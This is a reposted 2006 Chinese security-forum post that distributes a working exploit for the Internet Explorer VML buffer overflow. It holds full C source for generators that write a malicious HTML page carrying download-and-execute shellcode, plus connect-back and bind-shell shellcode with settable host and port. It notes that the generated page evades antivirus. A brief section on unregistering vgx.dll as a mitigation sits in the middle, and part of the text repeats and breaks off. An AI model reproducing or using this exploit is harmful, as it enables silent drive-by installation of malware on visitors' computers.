Internet Explorer VML Buffer Overflow Download Exec Exploit (0day)
2006-09-22 21:33
671 查看
[原创]又一匹烈马Internet Explorer VML Buffer Overflow Download Exec Exploit
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
推荐优先使用gyzy老大修改的版本
http://forum.eviloctal.com/read-htm-tid-24858.html
————————————————————————————————————
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:gyzy
所有代码都修改自NOP的模版,在此表示感谢。方便大家的研究写了个生成器,欢迎大家下载测试。NOP在milw0rm.com上公布的代码里有点小问题。填上了自己的shellcode,将第一个字节改成/xCC后发现shellcode的解码部分连续出现的三个/xFF中的后面两个会被破坏,这和以前的Serv-U溢出一样,所以在头部加入几个修正字节:
__asm{
add [esp+0x2E],0xC0
add [esp+0x2F],0xFF
}
重新测试,成功。测试环境Win2000 Professional SP4 + IE5.0
图片
代码也一并贴在这里:
————————————————————————————————————
一个最新的无补丁严重漏洞在今天被公布!
该漏洞存在于Windows的VML组件(用于在IE中显示矢量图),目前没有任何修补补丁。漏洞的攻击代码已经被发布,而且非常容易利用。最可能的攻击行为是在网页上放置木马,一旦用户访问该网页,将自动安装黑客的木马或者病毒,而用户不会收到任何警告。
简而言之,对于普通的XP系统用户,请看如下解决方法: 该漏洞目前尚无补丁,我们建议在微软发布补丁之前,至少采用如下方法之一来保护您的系统:
1、解除vgx.dll的注册:点击"开始"菜单,选择"运行",在其中输入下面的命令:
regsvr32 -u "%ProgramFiles%/Common Files/Microsoft Shared/VGX/vgx.dll"
然后点击"确定",在随后出现的弹出窗口中点击"确定"按钮。
在微软发布补丁后,如果想恢复注册,只需再用上述方法运行下面的命令即可:
regsvr32 "%ProgramFiles%/Common Files/Microsoft Shared/VGX/vgx.dll"
2、尽量使用非IE内核的网络浏览器,如Firefox、Opera等。
3、随时关注微软的最新补丁公告
漏洞影响
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1 and Service Pack 2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 with SP1 for Itanium-based Systems Edition
Microsoft Windows Server 2003 x64 Edition
MS站上的解决办法
Disable VML support in IE
Microsoft Security Advisory (925568) suggests the following techinques to disable VML support in IE:
Un-register Vgx.dll on Windows XP Service Pack 1; Windows XP Service Pack 2; Windows Server 2003 and Windows Server 2003 Service Pack 1
Modify the Access Control List on Vgx.dll to be more restrictive
Configure Internet Explorer 6 for Microsoft Windows XP Service Pack 2 to disable Binary and Script Behaviors in the Internet and Local Intranet security zone
测试效果如下
C:/Documents and Settings/zjg/桌面/新建文件夹/Debug>3
Windows VML Download Exec Exploit
Code by nop nop#xsec.org, Welcome to http://www.xsec.org
Usage: 3 <URL> [htmlfile]
C:/Documents and Settings/zjg/桌面/新建文件夹/Debug>3 http://127.0.0.1/test.exe
1.htm
[+] download url:http://127.0.0.1/test.exe
[+] exploit file:1.htm
[+] buff size 287 bytes
[+] exploit write to 1.htm success!
C:/Documents and Settings/zjg/桌面/新建文件夹/Debug>
生成的1.htm文件目前不被杀
On Windows XP SP2 systems the vulnerable component (VGX.DLL) is compiled with the /GS (Buffer Security Check) flag, making exploitation more difficult.
EXP在Windows XP SP2 下利用的难度大一点,主要是shellcode的问题,一些shellcode在Windows XP SP2 下运行会出错,哪位兄弟测试下下面这段代码能否运行于Windows XP SP2,如果不能的话就要考虑修改下shellcode
据下面几位老大的测试,可以确认这个漏洞在2000下可以利用
代码基于nop的基础上修改,这段shellcode代码就写在外面算了
#define g_ip "127.0.0.1"
#define g_port 1981
//don't change the offset
#define ip_offset 92
#define port_offset 99
//shellcode default connect back to 127.0.0.1:1981
unsigned char sc_connect_back_for_all_ver[]=
/* ip offset: 71 + 21 = 92 */
/* port offset: 78 + 21 = 99 */
/* 21 bytes decode */
"/xeb/x0e/x5b/x4b/x33/xc9/xb1/xfe/x80/x34/x0b/xee/xe2/xfa/xeb/x05"
"/xe8/xed/xff/xff/xff"
/* 254 bytes shellcode, xor with 0xee */
"/x07/x36/xee/xee/xee/xb1/x8a/x4f/xde/xee/xee/xee/x65/xae/xe2/x65"
"/x9e/xf2/x43/x65/x86/xe6/x65/x19/x84/xea/xb7/x06/x96/xee/xee/xee"
"/x0c/x17/x86/xdd/xdc/xee/xee/x86/x99/x9d/xdc/xb1/xba/x11/xf8/x7b"
"/x84/xed/xb7/x06/x8e/xee/xee/xee/x0c/x17/xbf/xbf/xbf/xbf/x84/xef"
"/x84/xec/x11/xb8/xfe/x7d/x86/x91/xee/xee/xef/x86/xec/xee/xee/xdb"
"/x65/x02/x84/xfe/xbb/xbd/x11/xb8/xfa/x6b/x2e/x9b/xd6/x65/x12/x84"
"/xfc/xb7/x45/x0c/x13/x88/x29/xaa/xca/xd2/xef/xef/x7d/x45/x45/x45"
"/x65/x12/x86/x8d/x83/x8a/xee/x65/x02/xbe/x63/xa9/xfe/xb9/xbe/xbf"
"/xbf/xbf/x84/xef/xbf/xbf/xbb/xbf/x11/xb8/xea/x84/x11/x11/xd9/x11"
"/xb8/xe2/x11/xb8/xf6/x11/xb8/xe6/xbf/xb8/x65/x9b/xd2/x65/x9a/xc0"
"/x96/xed/x1b/xb8/x65/x98/xce/xed/x1b/xdd/x27/xa7/xaf/x43/xed/x2b"
"/xdd/x35/xe1/x50/xfe/xd4/x38/x9a/xe6/x2f/x25/xe3/xed/x34/xae/x05"
"/x1f/xd5/xf1/x9b/x09/xb0/x65/xb0/xca/xed/x33/x88/x65/xe2/xa5/x65"
"/xb0/xf2/xed/x33/x65/xea/x65/xed/x2b/x45/xb0/xb7/x2d/x06/xcd/x11"
"/x11/x11/x60/xa0/xe0/x02/x9c/x10/x5d/xf8/x01/x20/x0e/x8e/x43/x37"
"/xeb/x20/x37/xe7/x1b/x43/x02/x17/x44/x8e/x09/x97/x28/x97";
port = htons(g_port)^(u_short)0xeeee;
ip = inet_addr(g_ip)^0xeeeeeeee;
memcpy(&sc_connect_back_for_all_ver[port_offset], &port, 2);
memcpy(&sc_connect_back_for_all_ver[ip_offset], &ip, 4);
strcpy(sc,sc_connect_back_for_all_ver);
CODE:
/*
*-----------------------------------------------------------------------
*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Complie : cl vml.c
* :
* Usage : d:/>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:/>vml http://xsec.org/xxx.exe xxx.htm
* :
*
*------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;
#define NOPSIZE 260
#define MAXURL 60
//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k
//注意:0x7Ffa4512是中文2k/xp/2k3通用的,建议使用0x7Ffa4512
//除非你要专门对2k测试
// Search Shellcode
unsigned char dc[] =
"/x8B/xDC/xBE/x6F/x6F/x6F/x70/x4E/xBF/x6F/x30/x30/x70/x4F/x43/x39"
"/x3B/x75/xFB/x4B/x80/x33/xEE/x39/x73/xFC/x75/xF7/xFF/xD3";
// Shellcode Start
unsigned char dcstart[] =
"noop";
//关于下面有人说到的shellcode的问题,我在这里考虑换段shellcode
另外给出几段shellcode供测试
//shellcode, 开放 TCP 8721端口
/* "/xe8/x56/x00/x00/x00/x53/
dbe0
x55/x56/x57/x8b/x6c/x24/x18/x8b/x45/x3c"
"/x8b/x54/x05/x78/x01/xea/x8b/x4a/x18/x8b/x5a/x20/x01/xeb/xe3/x32"
"/x49/x8b/x34/x8b/x01/xee/x31/xff/xfc/x31/xc0/xac/x38/xe0/x74/x07"
"/xc1/xcf/x0d/x01/xc7/xeb/xf2/x3b/x7c/x24/x14/x75/xe1/x8b/x5a/x24"
"/x01/xeb/x66/x8b/x0c/x4b/x8b/x5a/x1c/x01/xeb/x8b/x04/x8b/x01/xe8"
"/xeb/x02/x31/xc0/x5f/x5e/x5d/x5b/xc2/x08/x00/x5e/x6a/x30/x59/x64"
"/x8b/x19/x8b/x5b/x0c/x8b/x5b/x1c/x8b/x1b/x8b/x5b/x08/x53/x68/x8e"
"/x4e/x0e/xec/xff/xd6/x89/xc7/x81/xec/x00/x01/x00/x00/x57/x56/x53"
"/x89/xe5/xe8/x27/x00/x00/x00/x90/x01/x00/x00/xb6/x19/x18/xe7/xa4"
"/x19/x70/xe9/xe5/x49/x86/x49/xa4/x1a/x70/xc7/xa4/xad/x2e/xe9/xd9"
"/x09/xf5/xad/xcb/xed/xfc/x3b/x57/x53/x32/x5f/x33/x32/x00/x5b/x8d"
"/x4b/x20/x51/xff/xd7/x89/xdf/x89/xc3/x8d/x75/x14/x6a/x07/x59/x51"
"/x53/xff/x34/x8f/xff/x55/x04/x59/x89/x04/x8e/xe2/xf2/x2b/x27/x54"
"/xff/x37/xff/x55/x30/x31/xc0/x50/x50/x50/x50/x40/x50/x40/x50/xff"
"/x55/x2c/x89/xc7/x31/xdb/x53/x53/x68/x02/x00/x22/x11/x89/xe0/x6a"
"/x10/x50/x57/xff/x55/x24/x53/x57/xff/x55/x28/x53/x54/x57/xff/x55"
"/x20/x89/xc7/x68/x43/x4d/x44/x00/x89/xe3/x87/xfa/x31/xc0/x8d/x7c"
"/x24/xac/x6a/x15/x59/xf3/xab/x87/xfa/x83/xec/x54/xc6/x44/x24/x10"
"/x44/x66/xc7/x44/x24/x3c/x01/x01/x89/x7c/x24/x48/x89/x7c/x24/x4c"
"/x89/x7c/x24/x50/x8d/x44/x24/x10/x54/x50/x51/x51/x51/x41/x51/x49"
"/x51/x51/x53/x51/xff/x75/x00/x68/x72/xfe/xb3/x16/xff/x55/x04/xff"
"/xd0/x89/xe6/xff/x75/x00/x68/xad/xd9/x05/xce/xff/x55/x04/x89/xc3"
"/x6a/xff/xff/x36/xff/xd3/xff/x75/x00/x68/x7e/xd8/xe2/x73/xff/x55"
"/x04/x31/xdb/x53/xff/xd0" */
/*另外一段
The length of encoded shellcode is :418
The new Encoded shellcodeD is:
"/xeb/x16/x5a/x4a/x33/xc9/x8b/xc1/x66/xb9/xa2/x1/x66/x8b/xc1/x80"
"/x34/x2/x99/x48/xe2/xf9/xeb/x5/xe8/xe5/xff/xff/xff"
"/x72/x8a/xcf"
"/xaa/x59/xfd/x12/xd9/xa9/x12/xd9/x95/x12/xe9/x85/x34/x12/xd9/x91"
"/xc7/x5a/x72/xfa/xf9/x12/xf5/xbd/xbd/x12/xdc/xa5/x12/xcd/x9c/xe1"
"/x9a/x4c/x12/xd3/x81/x12/xc3/xb9/x9a/x44/x7a/xad/xd0/x12/xad/x12"
"/x9a/x6c/xaa/x66/xaa/x59/x65/x35/x1d/x59/xed/x9e/x58/x5e/x8a/x9a"
"/x61/x72/x6d/xa2/xe5/xbd/xb1/xec/x78/x12/xc3/xbd/x9a/x44/xff/x12"
"/x95/xd2/x12/xc3/x85/x9a/x44/x12/x9d/x12/x9a/x5c/x10/xdd/xbd/x85"
"/xf8/x5a/x34/xc9/xcb/x71/x33/x66/x66/x66/x10/x9e/x1a/x5d/x91/x1a"
"/x5e/x9d/xa2/x68/xec/x75/x5a/x72/x98/x55/xcc/x12/x75/x1a/x5d/x45"
"/x72/xcd/xaa/x59/xc9/x66/xcc/x71/x50/x5a/xf1/xed/xed/xe9/xa3/xc5"
"/xc5/xa8/xab/xae/xb7/xa9/xb7/xa9/xb7/xa8/xc5/xa8/xb7/xfc/xe1/xfc"
"/x99/x99/x99/x99/x99/x99/x99/x8b/x99/x9e/x99/xd7/x98/x95/x99/x41"
"/x97/xa4/x99/x81/x96/xa4/x99/xc1/x96/xa4/x17/xd7/x97/x75/x34/x40"
"/x9c/x57/xeb/x67/x2a/x8f/xe7/x41/x7b/xea/xbc/x29/x66/x5b/x74/x42"
"/x75/x61/xaf/x83/xb6/xe9/x72/x9b/x72/x9c/x71/x60/x66/x66/x66/xc7"
"/x18/x77/xcc/x99/x99/x99/x10/xec/x61/x18/x5f/xa9/x99/x99/x99/x71"
"/x92/x66/x66/x66/x12/x49/x14/xe4/x45/x12/x57/x1a/x58/x81/x71/xc6"
"/x66/x66/x66/x1a/x58/x9d/xc8/x21/x98/x98/xf6/xf7/x58/x61/x89/xc9"
"/xf1/xec/xeb/xf5/xf4/xcd/x66/xcc/x45/x12/x49/xc0/xc0/xc0/x71/xa6"
"/x66/x66/x66/xaa/x59/x67/x5d/xb2/x79/x10/xfc/x65/xc9/x66/xec/x65"
"/x66/xcc/x69/x9a/x5d/x12/x61/x21/x3a/x11/xf/x8/x6e/x49/x32/x21"
"/xe/x3/xa/x16/x6e/x49/x32/x21/x57/x50/x48/x3/x6e/x49/x32/xaa"
"/x59/xff/x21/xe1/xfc/x32/xaa/x59/xc9/xc9/x66/xec/x65/x66/xec/x61"
"/xf3/x99/x66/xcc/x6d/x1c/x59/x96/x1c/x8c/x66/x66/x66/xaa/x50/x28"
"/xcd/xb2/x78/x12/x65/xce/xaa/x59/x6a/x33/xc6/x5f/x9e/xdd/xaa/x59"
"/x14/xee/xdd/xcf/xce/xc9/xc9/xc9/xc9/xc9/xc9/x66/xec/x65/xc9/x66"
"/xcc/x7d/x6e/x49/xc9/x66/xaf/x66/xcc/x79/x70/x7a/x67/x66/x66";
*/
//the code is test http://127.0.0.1/1.exe
//Encode=0x99 equal 153(dec)
//Use UrlMode
//The length of new encoded URL shellcode_D is:447 bytes
//以上代码来自于一个shellcode生成器,我没时间写完整的shellcode生成代码了,所以通用程序就暂时搁置吧,不过自己改改代码,写个自己临时使用的代码应该没问题了,哪位兄弟有时间就写个更加完美的版本吧
//下面这段shellcode是nop原来的,有人说有问题,可以换成其他的shellcode试试
// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =
"/x07/x4B/xEE/xEE/xEE/xB1/x8A/x4F/xDE/xEE/xEE/xEE/x65/xAE/xE2/x65"
"/x9E/xF2/x43/x65/x86/xE6/x65/x19/x84/xEA/xB7/x06/xAB/xEE/xEE/xEE"
"/x0C/x17/x86/x81/x80/xEE/xEE/x86/x9B/x9C/x82/x83/xBA/x11/xF8/x7B"
"/x06/xDE/xEE/xEE/xEE/x6D/x02/xCE/x65/x32/x84/xCE/xBD/x11/xB8/xEA"
"/x29/xEA/xED/xB2/x8F/xC0/x8B/x29/xAA/xED/xEA/x96/x8B/xEE/xEE/xDD"
"/x2E/xBE/xBE/xBD/xB9/xBE/x11/xB8/xFE/x65/x32/xBE/xBD/x11/xB8/xE6"
"/x84/xEF/x11/xB8/xE2/xBF/xB8/x65/x9B/xD2/x65/x9A/xC0/x96/xED/x1B"
"/xB8/x65/x98/xCE/xED/x1B/xDD/x27/xA7/xAF/x43/xED/x2B/xDD/x35/xE1"
"/x50/xFE/xD4/x38/x9A/xE6/x2F/x25/xE3/xED/x34/xAE/x05/x1F/xD5/xF1"
"/x9B/x09/xB0/x65/xB0/xCA/xED/x33/x88/x65/xE2/xA5/x65/xB0/xF2/xED"
"/x33/x65/xEA/x65/xED/x2B/x45/xB0/xB7/x2D/x06/xB8/x11/x11/x11/x60"
"/xA0/xE0/x02/x2F/x97/x0B/x56/x76/x10/x64/xE0/x90/x36/x0C/x9D/xD8"
"/xF4/xC1/x9E";
// Shellcode End
unsigned char dcend[] =
"n00p";
// HTML Header
char * header =
"<html xmlns:v=/"urn:schemas-microsoft-com:vml/">/n"
"<head>/n"
"<title>XSec.org</title>/n"
"<style>/n"
"v//:* { behavior: url(#default#VML); }/n"
"</style>/n"
"</head>/n"
"<body>/n"
"<v:rect style=/"width:20pt;height:20pt/" fillcolor=/"red/">/n"
"<v:fill method=/"";
char * footer =
"/"/>/n"
"</v:rect>/n"
"</body>/n"
"</html>/n"
;
// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
int i=0;
unsigned int ncr = 0;
for(i=0; i<size; i+=2)
{
ncr = (buf[i+1] << 8) + buf[i];
fprintf(fp, "&#%d;", ncr);
}
}
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
unsigned char burl[255] = {0};
int sc_len = 0;
int psize = 0;
int i = 0;
unsigned int nop = 0x4141;
DWORD jmp = 0xeb06eb06;
if (argc < 2)
{
printf("Windows VML Download Exec Exploit/n");
printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org/n");
//printf("!!! 0Day !!! Please Keep Private!!!/n");
printf("/r/nUsage: %s <URL> [htmlfile]/r/n/n", argv[0]);
exit(1);
}
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) <
10 || strlen(url) > MAXURL)
{
printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d bytes./n", MAXURL);
return;
}
printf("[+] download url:%s/n", url);
if(argc >=3) file = argv[2];
printf("[+] exploit file:%s/n", file);
fp = fopen(file, "w+b");
//fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!/n");
return;
}
// print html header
fprintf(fp, "%s", header);
fflush(fp);
for(i=0; i<NOPSIZE; i++)
{
//fprintf(fp, "&#%d;", nop);
fprintf(fp, "A");
}
fflush(fp);
// print shellcode
memset(buf, 0x90, sizeof(buf));
//memset(buf, 0x90, NOPSIZE*2);
memcpy(buf, &ret, 4);
psize = 4+8+0x10;
memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(dc)-1;
memcpy(buf+psize, dcstart, 4);
psize += 4;
sc_len = sizeof(sc)-1;
memcpy(buf+psize, sc, sc_len);
psize += sc_len;
// print URL
memset(burl, 0, sizeof(burl));
strncpy(burl, url, 60);
for(i=0; i<strlen(url)+1; i++)
{
burl[i] = url[i] ^ 0xee;
}
memcpy(buf+psize, burl, strlen(url)+1);
psize += strlen(url)+1;
memcpy(buf+psize, dcend, 4);
psize += 4;
// print NCR
convert2ncr(buf, psize);
printf("[+] buff size %d bytes/n", psize);
// print html footer
fprintf(fp, "%s", footer);
fflush(fp);
printf("[+] exploit write to %s success!/n", file);
}
CODE:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "resource.h"
FILE *fp = NULL;
HWND hdlg;
#define NOPSIZE 260
#define MAXURL 60
//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k
INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam);
void create(char* url);
/* Search Shellcod
/x80/x44/x24/x1A/xC0
/x80/x44/x24/x1B/xFF
*/
unsigned char sh4llcode[] =
"/x80/x44/x24/x2E/xC0/x80/x44/x24/x2F/xFF/xEB/x10/x5A/x4A/x33/xC9/x66/xB9/x3C/x01/x80/x34/x0A/x99/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF"
"/x70/x4C/x99/x99/x99/xC3/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
"/xE9/x85/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5/x12/xED/x87/xE1/x9A"
"/x6A/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA/x74/xCF/xCE/xC8/x12/xA6"
"/x9A/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED/x91/xC0/xC6/x1A/x5E/x9D"
"/xDC/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF/xBD/x9A/x5A/x48/x78/x9A"
"/x58/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A/x5A/x58/x78/x9B/x9A/x58"
"/x12/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F/x97/x12/x49/xF3/x9D/xC0"
"/x71/xC9/x99/x99/x99/x1A/x5F/x94/xCB/xCF/x66/xCE/x65/xC3/x12/x41"
"/xF3/x98/xC0/x71/xA4/x99/x99/x99/x1A/x5F/x8A/xCF/xDF/x19/xA7/x19"
"/xEC/x63/x19/xAF/x19/xC7/x1A/x75/xB9/x12/x45/xF3/xB9/xCA/x66/xCE"
"/x75/x5E/x9D/x9A/xC5/xF8/xB7/xFC/x5E/xDD/x9A/x9D/xE1/xFC/x99/x99"
"/xAA/x59/xC9/xC9/xCA/xCF/xC9/x66/xCE/x65/x12/x45/xC9/xCA/x66/xCE"
"/x69/xC9/x66/xCE/x6D/xAA/x59/x35/x1C/x59/xEC/x60/xC8/xCB/xCF/xCA"
"/x66/x4B/xC3/xC0/x32/x7B/x77/xAA/x59/x5A/x71/xBF/x66/x66/x66"
"/xDE/xFC/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD/xEB/xFC/xEA/xEA/x99/xDE"
"/xFC/xED/xCA/xE0/xEA/xED/xFC/xF4/xDD/xF0/xEB/xFC/xFA/xED/xF6/xEB"
"/xE0/xD8/x99/xCE/xF0/xF7/xDC/xE1/xFC/xFA/x99/xDC/xE1/xF0/xED/xCD"
"/xF1/xEB/xFC/xF8/xFD/x99/xD5/xF6/xF8/xFD/xD5/xF0/xFB/xEB/xF8/xEB"
"/xE0/xD8/x99/xEC/xEB/xF5/xF4/xF6/xF7/x99/xCC/xCB/xD5/xDD/xF6/xEE"
"/xF7/xF5/xF6/xF8/xFD/xCD/xF6/xDF/xF0/xF5/xFC/xD8/x99";
// HTML Header
char * header =
"<html xmlns:v=/"urn:schemas-microsoft-com:vml/">/n"
"<head>/n"
"<title>XSec.org</title>/n"
"<style>/n"
"v//:* { behavior: url(#default#VML); }/n"
"</style>/n"
"</head>/n"
"<body>/n"
"<v:rect style=/"width:20pt;height:20pt/" fillcolor=/"red/">/n"
"<v:fill method=/"";
char * footer =
"/"/>/n"
"</v:rect>/n"
"</body>/n"
"</html>/n"
;
// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
int i=0;
unsigned int ncr = 0;
for(i=0; i<size; i+=2)
{
ncr = (buf[i+1] << 8) + buf[i];
fprintf(fp, "&#%d;", ncr);
}
}
void create(char* url)
{
unsigned char buf[1024] = {0};
unsigned char burl[255] = {0};
int sc_len = 0;
int psize = 0;
int i = 0;
unsigned int nop = 0x4141;
DWORD jmp = 0xeb06eb06;
fp = fopen("test.html", "w+b");
if(!fp)
{
return;
}
// print html header
fprintf(fp, "%s", header);
fflush(fp);
for(i=0; i<NOPSIZE; i++)
{
fprintf(fp, "A");
}
fflush(fp);
// print shellcode
memset(buf, 0x90, sizeof(buf));
memcpy(buf, &ret, 4);
psize = 4+8+0x10;
memcpy(buf+psize, sh4llcode, sizeof(sh4llcode)-1);//memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(sh4llcode)-1;
memcpy(buf+psize, url, strlen(url));//memcpy(buf+psize, dc, sizeof(dc)-1);
psize += strlen(url);
BYTE end = 0x80;
memcpy(buf+psize, &end, 1);
psize += 1;
// print NCR
convert2ncr(buf, psize);
// print html footer
fprintf(fp, "%s", footer);
fflush(fp);
}
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
DialogBox(hInstance,(LPCTSTR)IDD_DIALOG1,NULL,(DLGPROC)DialogProc);
return 0;
}
INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
switch (uMsg)
{
case WM_INITDIALOG:
hdlg = hwndDlg;
return true;
case WM_COMMAND:
if (LOWORD(wParam) == IDOK)
{
char url[256];
ZeroMemory(url,256);
GetDlgItemText(hdlg,IDC_EDIT1,url,256);
create(url);
MessageBox(hwndDlg,"恭喜,test.html已生成!","提示",MB_ICONINFORMATION);
}
if (LOWORD(wParam) == IDCANCEL)
{
EndDialog(hwndDlg, LOWORD(wParam));
PostQuitMessage(0);
}
break;
}
return 0;
}
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
推荐优先使用gyzy老大修改的版本
http://forum.eviloctal.com/read-htm-tid-24858.html
————————————————————————————————————
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:gyzy
所有代码都修改自NOP的模版,在此表示感谢。方便大家的研究写了个生成器,欢迎大家下载测试。NOP在milw0rm.com上公布的代码里有点小问题。填上了自己的shellcode,将第一个字节改成/xCC后发现shellcode的解码部分连续出现的三个/xFF中的后面两个会被破坏,这和以前的Serv-U溢出一样,所以在头部加入几个修正字节:
__asm{
add [esp+0x2E],0xC0
add [esp+0x2F],0xFF
}
重新测试,成功。测试环境Win2000 Professional SP4 + IE5.0
图片
代码也一并贴在这里:
————————————————————————————————————
一个最新的无补丁严重漏洞在今天被公布!
该漏洞存在于Windows的VML组件(用于在IE中显示矢量图),目前没有任何修补补丁。漏洞的攻击代码已经被发布,而且非常容易利用。最可能的攻击行为是在网页上放置木马,一旦用户访问该网页,将自动安装黑客的木马或者病毒,而用户不会收到任何警告。
简而言之,对于普通的XP系统用户,请看如下解决方法: 该漏洞目前尚无补丁,我们建议在微软发布补丁之前,至少采用如下方法之一来保护您的系统:
1、解除vgx.dll的注册:点击"开始"菜单,选择"运行",在其中输入下面的命令:
regsvr32 -u "%ProgramFiles%/Common Files/Microsoft Shared/VGX/vgx.dll"
然后点击"确定",在随后出现的弹出窗口中点击"确定"按钮。
在微软发布补丁后,如果想恢复注册,只需再用上述方法运行下面的命令即可:
regsvr32 "%ProgramFiles%/Common Files/Microsoft Shared/VGX/vgx.dll"
2、尽量使用非IE内核的网络浏览器,如Firefox、Opera等。
3、随时关注微软的最新补丁公告
漏洞影响
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1 and Service Pack 2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 with SP1 for Itanium-based Systems Edition
Microsoft Windows Server 2003 x64 Edition
MS站上的解决办法
Disable VML support in IE
Microsoft Security Advisory (925568) suggests the following techinques to disable VML support in IE:
Un-register Vgx.dll on Windows XP Service Pack 1; Windows XP Service Pack 2; Windows Server 2003 and Windows Server 2003 Service Pack 1
Modify the Access Control List on Vgx.dll to be more restrictive
Configure Internet Explorer 6 for Microsoft Windows XP Service Pack 2 to disable Binary and Script Behaviors in the Internet and Local Intranet security zone
测试效果如下
C:/Documents and Settings/zjg/桌面/新建文件夹/Debug>3
Windows VML Download Exec Exploit
Code by nop nop#xsec.org, Welcome to http://www.xsec.org
Usage: 3 <URL> [htmlfile]
C:/Documents and Settings/zjg/桌面/新建文件夹/Debug>3 http://127.0.0.1/test.exe
1.htm
[+] download url:http://127.0.0.1/test.exe
[+] exploit file:1.htm
[+] buff size 287 bytes
[+] exploit write to 1.htm success!
C:/Documents and Settings/zjg/桌面/新建文件夹/Debug>
生成的1.htm文件目前不被杀
On Windows XP SP2 systems the vulnerable component (VGX.DLL) is compiled with the /GS (Buffer Security Check) flag, making exploitation more difficult.
EXP在Windows XP SP2 下利用的难度大一点,主要是shellcode的问题,一些shellcode在Windows XP SP2 下运行会出错,哪位兄弟测试下下面这段代码能否运行于Windows XP SP2,如果不能的话就要考虑修改下shellcode
据下面几位老大的测试,可以确认这个漏洞在2000下可以利用
代码基于nop的基础上修改,这段shellcode代码就写在外面算了
#define g_ip "127.0.0.1"
#define g_port 1981
//don't change the offset
#define ip_offset 92
#define port_offset 99
//shellcode default connect back to 127.0.0.1:1981
unsigned char sc_connect_back_for_all_ver[]=
/* ip offset: 71 + 21 = 92 */
/* port offset: 78 + 21 = 99 */
/* 21 bytes decode */
"/xeb/x0e/x5b/x4b/x33/xc9/xb1/xfe/x80/x34/x0b/xee/xe2/xfa/xeb/x05"
"/xe8/xed/xff/xff/xff"
/* 254 bytes shellcode, xor with 0xee */
"/x07/x36/xee/xee/xee/xb1/x8a/x4f/xde/xee/xee/xee/x65/xae/xe2/x65"
"/x9e/xf2/x43/x65/x86/xe6/x65/x19/x84/xea/xb7/x06/x96/xee/xee/xee"
"/x0c/x17/x86/xdd/xdc/xee/xee/x86/x99/x9d/xdc/xb1/xba/x11/xf8/x7b"
"/x84/xed/xb7/x06/x8e/xee/xee/xee/x0c/x17/xbf/xbf/xbf/xbf/x84/xef"
"/x84/xec/x11/xb8/xfe/x7d/x86/x91/xee/xee/xef/x86/xec/xee/xee/xdb"
"/x65/x02/x84/xfe/xbb/xbd/x11/xb8/xfa/x6b/x2e/x9b/xd6/x65/x12/x84"
"/xfc/xb7/x45/x0c/x13/x88/x29/xaa/xca/xd2/xef/xef/x7d/x45/x45/x45"
"/x65/x12/x86/x8d/x83/x8a/xee/x65/x02/xbe/x63/xa9/xfe/xb9/xbe/xbf"
"/xbf/xbf/x84/xef/xbf/xbf/xbb/xbf/x11/xb8/xea/x84/x11/x11/xd9/x11"
"/xb8/xe2/x11/xb8/xf6/x11/xb8/xe6/xbf/xb8/x65/x9b/xd2/x65/x9a/xc0"
"/x96/xed/x1b/xb8/x65/x98/xce/xed/x1b/xdd/x27/xa7/xaf/x43/xed/x2b"
"/xdd/x35/xe1/x50/xfe/xd4/x38/x9a/xe6/x2f/x25/xe3/xed/x34/xae/x05"
"/x1f/xd5/xf1/x9b/x09/xb0/x65/xb0/xca/xed/x33/x88/x65/xe2/xa5/x65"
"/xb0/xf2/xed/x33/x65/xea/x65/xed/x2b/x45/xb0/xb7/x2d/x06/xcd/x11"
"/x11/x11/x60/xa0/xe0/x02/x9c/x10/x5d/xf8/x01/x20/x0e/x8e/x43/x37"
"/xeb/x20/x37/xe7/x1b/x43/x02/x17/x44/x8e/x09/x97/x28/x97";
port = htons(g_port)^(u_short)0xeeee;
ip = inet_addr(g_ip)^0xeeeeeeee;
memcpy(&sc_connect_back_for_all_ver[port_offset], &port, 2);
memcpy(&sc_connect_back_for_all_ver[ip_offset], &ip, 4);
